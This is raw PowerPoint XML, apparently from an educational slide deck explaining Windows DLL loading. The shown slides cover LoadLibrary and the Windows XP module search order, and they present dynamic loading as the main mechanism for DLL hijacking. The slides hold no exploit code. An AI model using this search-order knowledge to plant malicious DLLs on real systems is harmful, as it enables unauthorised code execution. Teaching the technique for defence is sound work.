                                <p:cTn id="32" presetID="16" presetClass="entr" presetSubtype="21"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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="35" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" nodeType="with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barn(inVertical)">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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="31"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="43" presetID="16" presetClass="entr" presetSubtype="21"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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="46" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" nodeType="with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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>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000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="37"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="37"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="37"/>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fade">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="38"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="38"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="38"/>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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="65"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1" grpId="0" animBg="1"/>
      <p:bldP spid="26" grpId="0" animBg="1"/>
      <p:bldP spid="28" grpId="0" animBg="1"/>
      <p:bldP spid="31" grpId="0" animBg="1"/>
      <p:bldP spid="36" grpId="0"/>
      <p:bldP spid="37" grpId="0"/>
      <p:bldP spid="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9457" y="4740833"/>
            <a:ext cx="7181447" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Programs can load DLLs in two ways:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1919437" y="305795"/>
            <a:ext cx="2846717" cy="886113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent3">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u="sng" dirty="0" smtClean="0"/>
              <a:t>DLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code and Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2486220" y="3621500"/>
            <a:ext cx="1713153" cy="731426"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent3">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User</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Smiley Face 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2599173" y="3744643"/>
            <a:ext cx="379562" cy="396815"/>
          </a:xfrm>
          <a:prstGeom prst="smileyFac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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2298865" y="3021747"/>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4117945" y="3021747"/>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4268099" y="2007421"/>
            <a:ext cx="2056824" cy="830309"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent4">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Windows Application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Arrow Connector 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4147419" y="1333456"/>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42349" y="2007872"/>
            <a:ext cx="2056824" cy="830309"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent4">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Windows Application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Straight Arrow Connector 28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2148711" y="1339233"/>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5634187" y="270495"/>
            <a:ext cx="2846717" cy="886113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent3">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u="sng" dirty="0" smtClean="0"/>
              <a:t>DLL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code and Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="Straight Arrow Connector 31"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5720586" y="1333456"/>
            <a:ext cx="300308" cy="52131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4943878" y="748851"/>
            <a:ext cx="512584" cy="2212"/>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570761" y="5016064"/>
            <a:ext cx="6096000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Static (Compile Time) Load </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1570761" y="5291295"/>
            <a:ext cx="3379580" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dynamic (Run Time) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Load</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167486812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418999"/>
            <a:ext cx="7181447" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Dynamic (Run Time)  Load</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548959" y="942219"/>
            <a:ext cx="6096000" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>- Main mechanism for DLL Hijacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548959" y="1249995"/>
            <a:ext cx="6096000" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>- LoadLibrary function (Windows API)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1091683" y="1573161"/>
            <a:ext cx="6096000" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>-Function that is used to load an external module, i.e. a DLL or another EXE into the calling processes address space</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3995594" y="2911990"/>
            <a:ext cx="4374684" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HMODULE WINAPI LoadLibrary(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  _In_ LPCTSTR lpFileName</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548959" y="4449513"/>
            <a:ext cx="7668918" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>- lpFileName can be either file name, or an absolute/relative path</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548959" y="4755838"/>
            <a:ext cx="7668918" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>- LoadLibraryEx, another related function</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rectangle 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1091683" y="5062163"/>
            <a:ext cx="7668918" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>- Still uses lpFileName, along with two additional input parameters</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangle 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1091683" y="5368488"/>
            <a:ext cx="7668918" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>- Suffers from same vulnerability if not used safely</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="349109920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inVertic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arn(inVertic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arn(inVertic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arn(inVertic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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="4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P spid="18" grpId="0"/>
      <p:bldP spid="19" grpId="0" animBg="1"/>
      <p:bldP spid="24" grpId="0"/>
      <p:bldP spid="30" grpId="0"/>
      <p:bldP spid="34"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342055"/>
            <a:ext cx="7181447" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>Module Search Order</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548959" y="942219"/>
            <a:ext cx="8888118" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>- Windows uses a search order if only a file name is used in LoadLibrary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548959" y="1296162"/>
            <a:ext cx="6096000" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>- In Windows XP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1759897" y="1759405"/>
            <a:ext cx="6096000" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Calling Application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Directory </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1759897" y="2173325"/>
            <a:ext cx="6096000" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Current Working Directory </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1773056" y="2573431"/>
            <a:ext cx="6096000" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- System Directory (C:\Windows\System32)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1759897" y="2942766"/>
            <a:ext cx="7193071" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>16-bit System Directory (C:\Windows\System)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1759897" y="3358262"/>
            <a:ext cx="6096000" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Directory (C:\Windows)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1759897" y="3773761"/>
            <a:ext cx="6938626" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Directories in PATH environment variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
